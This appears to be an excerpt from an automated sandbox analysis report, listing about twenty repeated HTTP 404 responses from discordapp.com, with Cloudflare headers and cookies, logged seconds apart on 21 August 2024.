                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=knesx7DSN5Jf9.f8nrcNe45dUvIee84DYFvSB0waUbA-1724230682-1.0.1.1-afhx6ocTWqnt.ionZY.wK7ha6AEq1GVZNUs8Sn_DQbRN2jlNCxgMhpoRRTmGIT7JtqYHjBy4YGz4p2bRFDXEMQ; path=/; expires=Wed, 21-Aug-24 09:28:02 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwMRErWBlHWTAXo6O8ONlrp6c1aYnMBbX6zSKFG4zWd2kpeqLzP4nb8SQVR%2FHOMITvFWtTKZsonxHnZjPAGrxU9JuG2xHVsMlZXsjEmdPokHfY10i3QbyuIpAOnsokjLBa7cZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=BTdj7aneGMzxlvEWKOh886C10hnjhxHmPMOc6dOKEKI-1724230682127-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b4338974204-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QBfgPowNSyHKBwR4f7j3OJQn_APs9Y.XzKYVaxMZMMc-1724230687-1.0.1.1-piFiTuSgFWnFvr615lIClE_pu43vyZ4PZ5ZZpULNdkvbL.N1DFWU6OBp4Z9bMUvY4hOZcLSSQPj0mlVW8P2s3A; path=/; expires=Wed, 21-Aug-24 09:28:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqHycy%2BgnWyAz6cOaaQCtMgB4h%2BuT3rt4wvexZiL%2Brg9Lv3fWb0Ylp0wyU3M7CBcx5TzHRlseblMYHP9FYF5p2TW%2F%2BgTAHz4pC5aYVSJHGAl0aKteFSp%2B69L%2FTUV6pQUZYMN4Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=X33qFnUkNQW1Ewxnpo4ZVIZo8wKEB7yMr056MhSjbCE-1724230687749-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b665922428f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bskmNyFA.em5pucrqCIeIAZxchsxcrAWFg7iixkJhvA-1724230693-1.0.1.1-47TjB8Yk9s.11hO6ZntteaTo8FbnA9qjd91b2I_Dr5q0RZaWWW5K3IUD5FyoZXX4QIN3AEIaSqWIk57yWm0NwA; path=/; expires=Wed, 21-Aug-24 09:28:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjMAwkdG0jbfdYcVfaeNwH9J3rviF3UGMvuZpmLWrAUdY4DIRoaLwQgOp%2Bmon%2BIrX7BTdB%2FsXko3ijz67fK7EudLWpuGfiV%2FLo5lWOaR5ia%2BXrYpUCRtJl3lDFxPbPPjC9zV7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=L47pnd5qDKv8ufhpS4KEHViVs6Z4b0fUpsJ4_MrWGco-1724230693394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696b899b0f7ca6-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:19 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=xX3H1OGqwmcWYigOX2Y0PXpWbveQUJPOzdgLKH1otTc-1724230699-1.0.1.1-XgtMHmm5jtkcBxJXYcob_OBN.7dzkLGmK6UG1ZnRM9pIuwE7ylMt1bozok8pWoThanDZGOxH8XwwKUsuzbr48A; path=/; expires=Wed, 21-Aug-24 09:28:19 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvlzd%2FnGLUcWrWE%2FsSLglO3kPKD4ADwOlxWdyNkM46L5l5uqpzu1JFX%2BgifvU847wWuWCGkBEq5leczmnL5b%2BPdwBOzOOCoxTlGdsDXqUs7WShRf65xy5xnPUVMTYa3OIS9WPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=MrWa4TPd6T5gDzXo7vdMSZrVbSssLLC_hrH8VND8Yec-1724230699076-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bad28fb8c63-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QCPexjQNCs2wcHfkMc3UB.KIL7v29VmCdADSrpsw1c4-1724230704-1.0.1.1-u2LWwTgBDJGOd27KhzdqLBonf2yhVTEUiQXtrOCU3IcGpiahiwFE8HhBaGhXGr6E5Qf9r4Gn1Acm0gh0Dnk7mA; path=/; expires=Wed, 21-Aug-24 09:28:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQNvSm18ZHkfgQFbwFxRSIONDoOx5MvXtAz1G0j1qz3qpOgum9JorpGJSkCp8QMPovbaueFNTQ2p4i9k%2FocaVfhR73QBpNDNjyJc4JM038vpmjbfTfjK%2BLlweau%2FSn8RV%2FRCvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=pNhmg.qUGiJXIK7Ia9wLlTbaFN.0BHeOkU_CnIP8v6o-1724230704735-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bd08a5e72b3-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=krurwKpbTymLVgA2aApYf0ltPpSMv8HcfCC86x2Xq7s-1724230710-1.0.1.1-MNrwiCoqVqUtpkKjh4noYP0rXrluX.KsR4hgHgRFjksQCVgwhK7qiAPz2EPBejbfS_ENn.0I5daTBoW0ZoqGSg; path=/; expires=Wed, 21-Aug-24 09:28:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c32HFYxZxHf0DFmno9id5UAIZLgZ7NmIGHdyPkv7uhTdPFo%2FgCjYf0ZbOfAJADKCoFlZeTed9WsmR3vjZ%2FSuAXIB6gg3EMdn9qj6WbtyiSeQb0jkNmqoJsCGHePr59ldtLnyKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=OCZA2quprmYGr.uAq_C0UfTwTpojAbtUaQOiPENfxYE-1724230710547-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bf4df28c330-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:37 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=8Cd9jYQ1izsurwmEqPFW3aHF00qy.Vl8W4xd3znwmzg-1724230717-1.0.1.1-Cg_LqgaHwqiHRxVbnFucaKxTTAk.5DElwYM75pzc4aUFc0zFUUj5vN7e7seSzFjszRhkJPNRYrA3BGzjY_73Lg; path=/; expires=Wed, 21-Aug-24 09:28:37 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN40IHTdZpy5FvY1ZBEtX1LHGiwQx5m64vk4%2Ba7KD%2BUuQaKm%2FkE2CBdAcWZH%2B42UyAd3wxXsZXYLI0KOlOaBxu6uubcPrHEwoG4kvoAKNBum%2BbnkJrFQcu5XC0zU8eTOluvPsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Vnv13vlL.9RSrGj1vXXKJoadQxpJWoA6EJKZJyNo2xY-1724230717062-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c1d98e00f59-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:42 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ZsescNtNQBJnq2y9c_4Fxz0TN2thXuVgGbIveMtnkM8-1724230722-1.0.1.1-ArLH5zt6K0KiWkFgbOYyjfZywBZeYzVhggeOJCNwNl.SR63AR5KdQnortVoGzx6A8O7t9xUtb7o_PPS5jEzgzg; path=/; expires=Wed, 21-Aug-24 09:28:42 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fOtJHQr%2BDq01%2FmWcHGEbFDJeQT72oXle5VcOwyecLh7yRLbX7SAdFK8628PKRUrYIyHo13ukFd9kgZgp4Bi6YQaAwu6NiAc9e%2BFEqMI0ykSGJpB0QMudHpgaGAbkIjx%2BKjkwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=yJ63nIIWAxjeSHzhuFsssk4DZoTpKx1ERgmCXNRsJ1Q-1724230722681-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c40bf06183d-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=4KNDY5YA.7ZVHZEg0lB64S65agZ.ULCcntjwbaxnH0Q-1724230728-1.0.1.1-w1Q4EcpdnxTHG84EfHv.gpl7BgPuOICKNlUFSPySoQOyPw4zLFl9IvIrGTcwa3mJcFIR40nBOWD5qPX6WMIpgQ; path=/; expires=Wed, 21-Aug-24 09:28:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlbKeO9YG1SHnNTf7uiMHu%2BmstTyqQHCewYnX%2BhAivdRBgUnR9N1PjT4YfPzDbK%2BTkmmkdEfYVysU%2F38hXeVHmISVAHrrMpkJIXNhboAgEqWWnoZU8rYG%2FTJAK2wRrQVEwMctg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=o1iLNz6bj2Uohj1MQihczC58zgng.Mp7vvGnaWyOeUU-1724230728299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c63ccd7c34b-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:54 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ey1ufPKZPn3objdNt5Cb1EVnz1pHpARgxVwYD11NvaM-1724230734-1.0.1.1-eWAQyhWuRFeo6D9wxxFXWvH5OlYjYkU3lf9FKbCN4GrjLoRZ6mqLFPV3Fo9JQYN.1D36KMug3vFXXI8Px1d9iw; path=/; expires=Wed, 21-Aug-24 09:28:54 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BeB5N3U1PMFtU6NGsqbmeLZGwRaEF5viUTU8yDk7gz4TTMVsh%2Fpvts2ZtjPhDh5zf3RCpIhRyg%2FJg%2F1JeLnajeiM674agm0QjdDRQ%2Bv0VNgjCTwm6wiFGVYr4PGqnzeG9XXzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=qnge2mMS7zgI4BEBwYdNSuL2PI4AyqmQ0IoU6WFYMVo-1724230734033-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c87adc20f42-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:59 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=inQIpPXoGjHTdRR16lfmIf8AlIOVJ4beJ4kAfo8Fs3Q-1724230739-1.0.1.1-X4Zdyrv6fnzmLBRFO.QE1HHVib1.2b2n7_WEseV2xmhdI.iKWNrneSt90JdW_43JLyBEGLHl7r5eTvO7qKxZYg; path=/; expires=Wed, 21-Aug-24 09:28:59 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3SIXvAicy4JP2wQA9TBs9SnSUHmtc%2B3dRtrPRKoZvePGomVq9xJ56A8e0qTmyuZvgXwS7pSENMzgvuyqrJ2lViqakWh7IcIe5XqC2QJ0svm9iO7tepFH6VH7adrOoUeAYgxFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=0Pq.Whoi9etDomuC2APzSn3GmrJQ8OiU8oe45jDs2wA-1724230739688-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696caaffba7cab-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:05 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=c6PYn6T0c0Iin.fXT3mH2FYc_JGbSq_aS.CxzV6SgT4-1724230745-1.0.1.1-jznGwhXsPNyewk2AG.ef7uVfgac1zWNCW4qRFzfy0lYbhHJokWJWwtM.hq7D0nkSNzZJxAwo6QQI.qyWMqyn0g; path=/; expires=Wed, 21-Aug-24 09:29:05 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVuJaTRU1GT172zocGCC%2BLkCimohU2CDTp6HBIUNRmeZizF9jfUKp%2FUjmb2IFdFmQKIR6fwBVqZK0BlBejVtwEWsj3Y71ns38bekz7%2FIM55YNaXQf1fNPvri4rYqe0MBottEAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Dq6QkRfgMEtW1GMBBzV5FfC4CdIRSN5bcwmXUOm5HYE-1724230745345-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696cce598f0fa8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:11 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=VQTvQJ3y.uOD5g5c5xaWQNBhmM188o6rIDLGA17ECvE-1724230751-1.0.1.1-l4ROs4WATUeNi3_gvAbRIOgRx6QYhRIGzBZd3HN6JxvjiMze8qjNl362KSX1su1MIr_QwzpgaqyCGjG0ZnCutg; path=/; expires=Wed, 21-Aug-24 09:29:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSMCMHkPUKKo69PhlkvUbfaq2w4M%2Fc2xgPXaCHYscTvO5rECAksPm6wn8GFnxyMseH%2BXJXDZTDaVYxfeDRtQKG0FVgbQu%2B2woN9YiUbVchUQlaHjVD%2BkyN5ghpwoA2DYEswpEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=qlm_WPNa1tr.980IQ_.FMEitkNc841bngWtopOaTO.U-1724230751170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696cf2b8da4231-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:16 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Pyqw3b0Di8OWxj7id.OtiugXOixtBidedcXK4GKwRB0-1724230756-1.0.1.1-rz7kJXfS127Fd.FbNPKGQWFWcMQL0AnlHjf5PdQYRaCk49b0MHiDwAADHu5MDs9Z6VCL2pJ_FgrzLpUOLbir3A; path=/; expires=Wed, 21-Aug-24 09:29:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPLlUIMKxdOg3bSkR9WN3hmG06gSa7BVJ3vm0rI3ue57IfTF7GcY8dWK7sSoaUA6g3MnFJ9c1xuG2lzklCZe4lgRWXTmWjREaCOTIxGTM9%2BW8Nw8hTcY%2FiI5Ihapu13b5V3pVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=On.XWPCCSsi80_kI0t9mbY238fDy6F7wO85JdzOGESg-1724230756797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d15e9af0f77-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=r5q_MK8YpFMYPNbcc1.kX8RIiVI1rtNeb4bFxocPKYo-1724230762-1.0.1.1-8Hdd2zz1IHHPvVuBEh.DDYTo4N4tsRJAHAj6yNUcWr3mMDFkfb_DnpFF07XPLwVj.mnZDzEmyBIbnJhRohWrOg; path=/; expires=Wed, 21-Aug-24 09:29:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnKxc6qMscffapdK5t%2Fnee0CXxMVpH%2Fr4F1tc5%2FgWark2gCs95NXGVVmPJtBYCeep1s03ek9li1qVIK1i59aBruDdQB%2BrrdvSoSfpuogiXXM4Tf29fTllI17bv1qv5m6fOioxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=bUG0XFfKSAkJAqxm47.1o7wP2qf9SbJqpD8R6ET13K4-1724230762433-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d392f7c0fa8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=lUWhQ041.lMfsVwD_ObAqgnetF1e6faH6a42qxBSUC4-1724230768-1.0.1.1-ui6c2j7YChLvaWYB2_1ykF_FQKVrPBA6dx2rva5NyVMvwS_y_VdQA6lcVX8ogJ.XfNCZ5tNxSgFczuGbGr08Bg; path=/; expires=Wed, 21-Aug-24 09:29:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIvyOxxUQQzeoC%2F2iCgIfEesd%2FfZqebLYLgR2WG8HlQvR%2Fivgch5wDcLzbo%2FUWcckSc5tzaHPoePVAoKA3Omvr4bZly%2F8pWnytd8D8iyHM2fLyHNcgLbRyugMzmdlZIF8mzyRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=M3quJcqeq9eAhjRyx1k7x1SjPA_U8AwtU4Uc0fUXMtI-1724230768081-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d5c6de532e2-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:33 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=V_YOpyhs7fWfw_vz2CWkj5fKz7r_7WhhtcWixudnSSw-1724230773-1.0.1.1-OracUGoDq0mWHrpIN9tj7OMnHBQP1y8oRRPWE0_EsmDFRMaS.aZxwGoh_e9g8b3twi3zFoht7tK6O0btn9nfOQ; path=/; expires=Wed, 21-Aug-24 09:29:33 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm1ZYh%2BUy03nSO56alZ%2F1nKYT%2B5E%2F6jR4uD2Gn9gArx%2FTdsIP6Cg54mNmciCVCBIg%2FXc6pfVAGTSBP0t6xlRAQF%2F7Emlu8pyob5WrGZr2QcFnhAxwUlXnX8MhsvWHL4ewqqOQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=1EsbuVwMRkLUBKh2Lp9i_6pU0rAVxa0kCETiLsoSo6s-1724230773697-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d7f7c5f159f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=VsfeA5YgZU0Alz8.JLAyCajoPQkSuqlniiEt_j69nYo-1724230779-1.0.1.1-RkPFY9dJiAKhFlkDvlNOnJMNXWoB8ebDCCx7XmVieINAE55ouduS.fj13.vPotom183wMaAFvEVAhb80nYmQ.A; path=/; expires=Wed, 21-Aug-24 09:29:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FCiPLmv5iDCAvLc9iwjzkbIAUWHDyub%2BUeGp4KnaSHBtPlkBpKV072T9mGPBYjPCMLCwwcXdoqmDC%2BGnUl6PvMOo6%2FC0zyoFiVjlnLiqMKu2rjd6Ps9WKnctqaR%2BT0h4KzVGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=zL.9I.dDqc9HmiC5tbwb8GcpOGQER.hBqM6ceH0TugY-1724230779332-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696da2b84143c8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:44 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=FMKPU8XYSsF9F0E8B8.nIZRWilKXobToQ0q0_kbPgbs-1724230784-1.0.1.1-0ZxROcpUAUcpmOQ6zkW17EVvZwI26kQ7.Gpsvld8046KgUHFY3tRRKGyT3qzGrrsE7DpPNhZ8uRxMF2h5xIItA; path=/; expires=Wed, 21-Aug-24 09:29:44 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFSphp%2BEx8xB2aVO%2Bhu4lJkJohZmqW7rn1pJpqUKKcTwiCA%2BRZEpHby87N69J%2FzoBGa4P1OfAa5YDuYyEUyC%2FpNqzCo7PpTYWAk0JYCPHHWKYC0MaKVYs7yLKH41vpAKxGWssA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=u7uVKjud3VTit6vZ4rnlUu29y6DA_m68kF3DnWkReFI-1724230784999-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696dc63cbe1835-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=77JwWXGdx7zwtHQr8u0GrFbJscrwxdofdu5xXN3Bj5Q-1724230790-1.0.1.1-dQ.zCkxriWAduqA4m26I02cvWE50qYc5VyiawPsOifJYMtEaZW5wGSrecfTLdiMC5dFpHgoFFxZZOZyDlRpqrw; path=/; expires=Wed, 21-Aug-24 09:29:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmOK%2FFnaoNgi1y3qLWSDcofay3t6NskD9PG8QN5rxCWdy3BLsIGFgXyRWNHxWmFHVQMBeRF2HYTsdXy4WD499L8AvkPIL3VkTb%2B4HoW1tRV8KGN2Qg00n50RHUeKJozbDmkM0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=_u.u67H888eUwBaugIH0aV9p8M77z21FJ3a_xZn4fEA-1724230790644-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696de96ef9c434-EWRalt-svc: h3=":443"; ma=86400
